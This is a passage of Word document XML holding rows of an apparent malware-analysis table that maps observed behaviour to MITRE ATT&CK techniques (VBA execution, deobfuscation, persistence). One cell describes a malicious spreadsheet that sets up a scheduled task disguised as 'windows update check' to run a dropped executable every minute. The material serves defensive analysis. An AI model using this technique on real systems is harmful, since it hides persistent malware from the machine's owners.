            <w:r w:rsidRPr="00486034">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00486034">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00486034">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="128CD5B2" w14:textId="3F212801" w:rsidR="007B58F4" w:rsidRPr="00B857D7" w:rsidRDefault="00486034" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00486034">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00486034">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FEECCFB" w14:textId="77777777" w:rsidR="007B58F4" w:rsidRDefault="007B58F4" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="473A7F51" w14:textId="77777777" w:rsidR="007B58F4" w:rsidRPr="00B857D7" w:rsidRDefault="007B58F4" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A3320DE" w14:textId="09E2D00C" w:rsidR="007B58F4" w:rsidRDefault="007D3AF5" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0680A158" w14:textId="6C2C9439" w:rsidR="007B58F4" w:rsidRDefault="00486034" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FBA6565" w14:textId="71E99AF6" w:rsidR="007B58F4" w:rsidRDefault="007B58F4" w:rsidP="00D26036">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00A05B29">
              <w:t>See above</w:t>
            </w:r>
            <w:r w:rsidRPr="00F125AD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B58F4" w:rsidRPr="00B857D7" w14:paraId="60FFB897" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1061EDD4" w14:textId="4D6B57A4" w:rsidR="007B58F4" w:rsidRDefault="007D3AF5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17ED9D55" w14:textId="7FA16198" w:rsidR="007B58F4" w:rsidRPr="00B857D7" w:rsidRDefault="007D3AF5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11B98C04" w14:textId="77F063E1" w:rsidR="007B58F4" w:rsidRPr="00B857D7" w:rsidRDefault="007D3AF5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D3AF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007D3AF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007D3AF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007D3AF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007D3AF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="163D2988" w14:textId="5C34B9F4" w:rsidR="007B58F4" w:rsidRDefault="007D3AF5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="436F0319" w14:textId="77777777" w:rsidR="007B58F4" w:rsidRPr="00B857D7" w:rsidRDefault="007B58F4" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D6B4DF" w14:textId="6DCEB25C" w:rsidR="007B58F4" w:rsidRDefault="007D3AF5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BE579E0" w14:textId="576EB6E5" w:rsidR="007B58F4" w:rsidRDefault="007D3AF5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE/IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D8135F3" w14:textId="71C85A40" w:rsidR="007B58F4" w:rsidRDefault="00A05B29" w:rsidP="002F6F9E">
            <w:r>
              <w:t>[1] See above</w:t>
            </w:r>
            <w:r w:rsidRPr="00F125AD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A521A" w:rsidRPr="00B857D7" w14:paraId="25784BAC" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CB140D4" w14:textId="629F513D" w:rsidR="009A521A" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5710D005" w14:textId="77777777" w:rsidR="009A521A" w:rsidRPr="00B857D7" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00486034">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00486034">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00486034">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B0922D6" w14:textId="77777777" w:rsidR="009A521A" w:rsidRPr="00B857D7" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00486034">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00486034">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="688A4F78" w14:textId="345C5CC2" w:rsidR="009A521A" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D17A5BB" w14:textId="77777777" w:rsidR="009A521A" w:rsidRPr="00B857D7" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3DC96E" w14:textId="77777777" w:rsidR="009A521A" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70655A46" w14:textId="77777777" w:rsidR="009A521A" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B451D0C" w14:textId="37CBCD44" w:rsidR="009A521A" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="009A521A">
              <w:t>The spreadsheet also creates a scheduled task named "windows update check" that runs the file C:\Users\&lt;user_name&gt;\.templates\System Manager.exe every minute. Upon closing the spreadsheet, a final VBA function will rename System.doc to System Manager.exe. Figure 3 provides a snippet of VBA code that creates the scheduled task, clearly obfuscated to avoid simple detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A521A" w:rsidRPr="00B857D7" w14:paraId="168186A0" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A739C86" w14:textId="2DFE9D8B" w:rsidR="009A521A" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5048975F" w14:textId="77777777" w:rsidR="009A521A" w:rsidRPr="00B857D7" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F125AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BE3F76C" w14:textId="77777777" w:rsidR="009A521A" w:rsidRPr="00B857D7" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D3AF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007D3AF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007D3AF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007D3AF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007D3AF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4397B0E4" w14:textId="2C89CE9F" w:rsidR="009A521A" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D69FFAF" w14:textId="77777777" w:rsidR="009A521A" w:rsidRPr="00B857D7" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5682A2C8" w14:textId="77777777" w:rsidR="009A521A" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CABB410" w14:textId="77777777" w:rsidR="009A521A" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE/IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1227A8C0" w14:textId="77777777" w:rsidR="009A521A" w:rsidRDefault="009A521A" w:rsidP="00D26036">
            <w:r>
              <w:t>[1] See above</w:t>
            </w:r>
            <w:r w:rsidRPr="00F125AD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B58F4" w:rsidRPr="00B857D7" w14:paraId="04F084BD" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54320E5D" w14:textId="6FEBD454" w:rsidR="007B58F4" w:rsidRDefault="00BC49FB" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F5DDF07" w14:textId="47AF1336" w:rsidR="007B58F4" w:rsidRPr="00B857D7" w:rsidRDefault="00BC49FB" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BC49FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
